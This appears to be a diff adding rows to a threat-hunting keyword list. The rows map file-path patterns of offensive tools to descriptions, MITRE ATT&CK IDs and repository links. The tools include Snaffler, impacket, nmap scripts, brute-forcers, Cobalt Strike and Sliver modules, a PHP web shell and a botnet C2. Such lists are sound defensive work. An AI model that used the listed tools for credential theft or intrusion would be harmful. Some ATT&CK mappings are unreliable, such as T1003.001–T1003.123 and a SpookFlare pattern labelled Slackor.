+"*/SnaffCon.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - 
T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*/SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - 
T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*/SnaffCore/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - 
T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*/snafflertest/*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - 
T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*/SnaffPoint.git*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z"
+"*/sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/sniffer.git*","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","7","668","58","2022-07-27T15:13:57Z","2021-11-08T15:36:03Z"
+"*/sniffer-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-hh3c-logins.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-ios-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-netstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-sysdescr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-win32-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-win32-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-win32-software.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmp-win32-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/snmpwn.git*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z"
+"*/snmpwn.rb*","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. 
allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","3","222","50","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z"
+"*/SocialBox.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z"
+"*/SocialBox-Termux*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","10","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z"
+"*/SocialPwned*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z"
+"*/socks-auth-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/socks-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/socks-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/spacerunner.exe*","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
+"*/SpaceRunner.git*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
+"*/SpamChannel.git*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z"
+"*/spawn.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z"
+"*/spellbound.git*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*/spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*/spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*/spider.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z"
+"*/spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/SpiderFoot-*.log.cs*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
+"*/SpiderFoot.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*/spiderfoot.git*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*/SpiderMate/Jatayu*","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","31","8","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" +"*/splunk_whisperer.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*/SplunkWhisperer2.git*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*/spoof/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/mdns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/spoof/spoof_windows.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/SpookFlare.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/spoolsystem/SpoolTrigger/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" 